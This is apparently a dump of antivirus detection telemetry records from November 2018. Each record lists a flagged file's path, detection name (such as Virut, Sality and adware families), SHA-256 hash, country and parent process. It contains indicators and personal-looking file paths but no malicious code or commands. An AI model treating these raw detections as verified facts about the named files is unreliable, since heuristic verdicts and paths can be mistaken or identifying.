  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\?\\C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3b58968ace2221c198fc27a603e9be8a9e8d8d2f4b9a59e450602286a87ad694', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3778b8c6a30ea1bee29be3fbe259297f4d350b0bc7813191b2b48f653db1a54a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\3778B8C6A30EA1BEE29BE3FBE259297F4D350B0BC7813191B2B48F653DB1A54A', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='3778b8c6a30ea1bee29be3fbe259297f4d350b0bc7813191b2b48f653db1a54a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155016-87d8b36b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155016-87D8B36B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160228-032c537e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160228-032C537E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='p3k bkkm.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\MATERI TRAINING\\materi p3k BKKM\\p3k BKKM.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tripeaks.exe', filepath='C:\\PROGRAM FILES\\GAMEHOUSE GAMES COLLECTION\\ANCIENT TRIPEAKS\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='2e7e18c5fdf00ac0b45f3880a122cda23d38d3a23120ad2a967b27863dcdaee8', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Program Files\\\\\\\\HP\\\\\\\\HP Deskjet 1510 series\\\\\\\\bin\\\\\\\\HPStatusBL.dll\\\\\\",RunDLLEntry SERIALNUMBER=CN4C22P0BT05XJ;CONNECTION=USB;MONITOR=1;', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T10:07:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105543-2508709c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105424-16C0ABD9\\AVSCAN-20181101-105543-2508709C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daftar k3.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\DAFTAR K3\\DAFTAR K3.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-030400-67ed101f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-004656-B5FD04F1\\AVSCAN-20181101-030400-67ED101F', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e981c3182957d2887773b0d517bc4ed80fa9a2a5e01da57124a13fecd3577efa', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='ee0260544e952c11244cba40bb0b9cd684da26aee741eb4805841c5770f9acb5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-01T09:57:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ef69213b2d755d59d820a3c7c539266025891cfb66702206d50067e0ba4723d6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EF69213B2D755D59D820A3C7C539266025891CFB66702206D50067E0BA4723D6', filesize=768000, name='HEUR/AGEN.1024045.#M1.#R1'), hash='ef69213b2d755d59d820a3c7c539266025891cfb66702206d50067e0ba4723d6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:36:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161709-f6d7f8a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161709-F6D7F8A7', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='eda9a788d05a6ab3b2c36dfe71e05eba5c35de687fd82229c9a7868c6367c5e7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D91F930AB16122533E4B3AF12556296CE2EE17585D0261932587BE8EA6613AB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:11:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='du phong truot gia.xls', filepath='C:\\Users\\X\\Dropbox\\4. VINH LOC _ 2018\\7. TRINH PHE DUYET THIET KE\\6. Trinh phe duyet Lan 3 _ 26.10.2018\\Tham tra lan 5  _ So 86 ngay 24.10.2018\\Lan 5\\TDT-Tom Lua (tham dinh lan 5)\\Du phong truot gia.xls', filesize=448000, name='X2000M/Laroux.FO.#M1.#R1'), hash='df3ad22b522bcd2c9b46c0caf75cf95a7908e7b51e24d668b8e32841815d1727', metadata=Row(cmdline='\\\\\\/systemstartup', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T12:56:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:09:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:22:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wikipedia-degadget-downloader.exe', filepath='J:\\GWF\\LW-E\\Gwf-2\\Update\\Miniaturanwendungen\\wikipedia-degadget-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='af99183084545233d4b17adf4b8ac6981e4800616674b17dad32b20577933911', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD.EXE', parentsize=1074896, timestamp='2018-11-01T19:39:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='game.exe', filepath='\\\\?\\K:\\Beach Party Craze\\game.exe', filesize=1792000, name='W32/Neshta.A.#M1.#R1'), hash='ba01e14a7ce839072c4333afa05a7d9b7b5d3122cc8f00bdac2c13935915514f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:49:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183557-e9d8e840', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-183557-E9D8E840', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:39:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ade012c4275bb7ed3281760e03b3de2e2bcd53e2b81361f68a3a45f4363b7d1c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\ADE012C4275BB7ED3281760E03B3DE2E2BCD53E2B81361F68A3A45F4363B7D1C', filesize=2560000, name='Worm/Ngrbot.adwm.#M1.#R1'), hash='ade012c4275bb7ed3281760e03b3de2e2bcd53e2b81361f68a3a45f4363b7d1c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apachemonitor.exe', filepath='H:\\xampp\\apache\\bin\\ApacheMonitor.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='728e85e6f409674780626c1ac8bd8be3751b9a5b108b5fc8ac558d5a6cbc3da6', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-01T06:59:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsn7A7E.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T20:51:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-225348-042c4dc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91b74da9\\AVSCAN-20181031-225153-F8CF7756\\AVSCAN-20181031-225348-042C4DC3', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:53:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110618-d747b30d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110618-D747B30D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-132646-d0be74fa', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b58d36e\\AVSCAN-20181102-131433-69A02F5C\\AVSCAN-20181102-132646-D0BE74FA', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:31:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='655779cbc38199fc88e3b913c7f9b85b4c32b00c67dee9cde97beca33d1419ca', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\655779CBC38199FC88E3B913C7F9B85B4C32B00C67DEE9CDE97BECA33D1419CA', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='655779cbc38199fc88e3b913c7f9b85b4c32b00c67dee9cde97beca33d1419ca', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:11:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='635423437276d091c941fff2f7538391b1c635546690eb32e0cea700df4b2c43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-32\\635423437276D091C941FFF2F7538391B1C635546690EB32E0CEA700DF4B2C43', filesize=512000, name='TR/Dropper.Gen.#M300.#R4380'), hash='635423437276d091c941fff2f7538391b1c635546690eb32e0cea700df4b2c43', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-8.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-9.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 30.10.2018-31.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T10:49:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dellinspiron1440driversoundxp.exe', filepath='E:\\driver\\dellinspiron1440driversoundxp\\dellinspiron1440driversoundxp.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='211aa6b0cb35b56bfdf79555680fac2090cf9201edc0491c27463b32af0a652e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115635-1f000096', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a6478a3\\AVSCAN-20181101-114551-D907279B\\AVSCAN-20181101-115635-1F000096', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='marioforever.exe', filepath='j:\\بوسي\\new folder (3)\\اغانى جديدة بيشوى\\ترانيم الشهور\\de4\\mario forever\\marioforever\\MarioForever.exe', filesize=64000, name='W32/Sality.AT.#M1.#R1'), hash='257705e297983db7895b95c58530e8c4c24b2f91e5531b3289866c91ee118f75', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210214-40e61ec7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78b7b22e\\AVSCAN-20181101-205727-1A91A098\\AVSCAN-20181101-210214-40E61EC7', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:02:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:25:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173838-65085eda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d67868\\AVSCAN-20181101-171852-E21F9068\\AVSCAN-20181101-173838-65085EDA', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:38:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='รูปไปเที่ยวภูเรือ.exe', filepath='E:\\picture\\Phu-rea\\รูปไปเที่ยวภูเรือ\\รูปไปเที่ยวภูเรือ.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='77b29d37ec3d5c0cd72dd9bb550bec0f1876a80b619e64ca52dadd57475b0a87', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002508-49afa84c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002508-49AFA84C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thông báo hỏi cung.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\thông báo hỏi cung.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='3ddfe389744ddf69f04615b4ed17a2f5626edc20f4d5e790680904157ab8eede', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000430a', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000430a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:39:29Z'), dt=datetime.date(2018, 11, 1)),
